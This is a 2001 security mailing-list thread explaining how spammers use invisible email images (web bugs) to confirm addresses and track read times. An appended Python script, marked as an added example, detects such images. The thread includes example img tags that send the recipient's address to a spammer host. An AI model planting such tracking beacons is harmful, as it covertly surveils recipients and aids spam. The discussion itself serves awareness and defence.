Vulnerability Development mailing list archives

Re: Email webbugs


From: "Mariano Vassallo" <anakin () edunexo com>
Date: Tue, 28 Aug 2001 15:13:36 -0300

afaik, webbugs work like this:
Spammer X sends you an HTML mail with an invisible image from his site
 ( <img src=http://www.weluvspam.com/bug.gif height=1 width=1> )
When you read this email in Outlook, the image (bug.gif) is downloaded from
the spammer's site.
If the image is generated by a CGI script he can log the time you read your
mail, and validate your address.
 For example, instead of bug.gif, he could use a script to create the image:
    <img src=http://www.weluvspam.com/createimage.php?mail=youremail () yourdomain com >
    the script (createimage.php) could:
        save the "mail=youremail () yourdomain com" parameter to a database of
        valid email addresses
        save the time of the day you checked your mail (combined with the
        time the email was sent - taken from a database - it can be used to
        know how often a person checks his mail, and at what time)
        determine whether you visited a certain website recently (timing how
        long it takes to load an image from that website. If it loads
        immediately, then you probably have it in your browser's cache)

Mariano

----- Original Message -----
From: "Dom De Vitto" <Dom () DeVitto com>
To: "Peter Pekala" <peterp () netnitco net>; "abuse" <postmaster () getinfo org>;
"Focus-MS" <focus-ms () securityfocus com>
Cc: "VULN-DEV@SECURITYFOCUS. COM" <VULN-DEV () securityfocus com>;
"BUGTRAQ@SECURITYFOCUS. COM" <BUGTRAQ () securityfocus com>;
<win2ksecadvice () listserv ntsecurity net>
Sent: Tuesday, August 28, 2001 5:42 AM
Subject: RE: Email webbugs


Webbugs are NOT return receipts!!
Everybody should *at least* have return-receipts set to 'prompt'.
That is a no-brainer.
Web bugs are totally different, and can divulge a lot more information -
especially when tallied with cross-host information.

Dom
-----Original Message-----
From: Peter Pekala [mailto:peterp () netnitco net]
Sent: 27 August 2001 17:11
To: abuse; Focus-MS
Cc: VULN-DEV@SECURITYFOCUS. COM; BUGTRAQ@SECURITYFOCUS. COM;
win2ksecadvice () listserv ntsecurity net
Subject: Re: Email webbugs


In Outlook Express - Have you tried configuring this through Tools -
Options - Receipts - Returning Read Receipts ?

- Peter


: One of the things that has always bothered me about Outlook Express and
: Outlook is that they are susceptible to webbugs. Basically there are no
: options to block confirmation of your reading an email so any spammer can
: verify that your address is active as long as they can get you to just view
: an email.
:
: A lot of people have difficulty understanding exactly what this means so I
: set up a demonstration page at http://www.nthelp.com/OEtest/oe.htm in an
: attempt to raise awareness of this nonsense and get MS to do something about
: it. I don't know if other email programs like Eudora and Netscape are
: vulnerable to email webbugs so if anyone tests those please let me know the
: results.
:
: Anyway, I've made the test site available to the public now so if you want
: to check your email reader, feel free.
:
: Geo.
:
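
A defensive check for the two image forms described in the message above, as an added example that is not part of the original thread: it scans an HTML mail body for remote images and reports why each can act as a web bug. The class and function names, the `tracker.example` host and the sample address are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

EMAIL_RE = re.compile(r"[^@\s=&]+@[^@\s=&]+\.[A-Za-z]{2,}")

class WebBugFinder(HTMLParser):
    """Collect remote <img> references and why each one can act as a web bug."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (url, [reasons]) per remote image

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        attr = {name: (value or "").strip() for name, value in attrs}
        url = attr.get("src", "")
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https"):
            return  # cid:/data: images travel inside the message, no callback
        reasons = ["remote fetch reveals that and when the mail was opened"]
        if attr.get("width") in ("0", "1") and attr.get("height") in ("0", "1"):
            reasons.append("invisible image (1x1 or smaller)")
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if EMAIL_RE.fullmatch(value):
                reasons.append(f"recipient address in parameter '{name}'")
        self.findings.append((url, reasons))

def find_web_bugs(html_body):
    """Return a list of (url, reasons) for every remote image in the body."""
    finder = WebBugFinder()
    finder.feed(html_body)
    finder.close()
    return finder.findings

# Constructed sample body: host and address are placeholders.
SAMPLE = """<html><body>
<img src=http://tracker.example/bug.gif height=1 width=1>
<img src=http://tracker.example/createimage.php?mail=user@example.com >
<img src="cid:logo" width=1 height=1>
</body></html>"""

if __name__ == "__main__":
    for url, reasons in find_web_bugs(SAMPLE):
        print(url)
        for reason in reasons:
            print("   -", reason)
```

A mail client or gateway can use a non-empty result as the signal to withhold remote content until the reader explicitly asks for it.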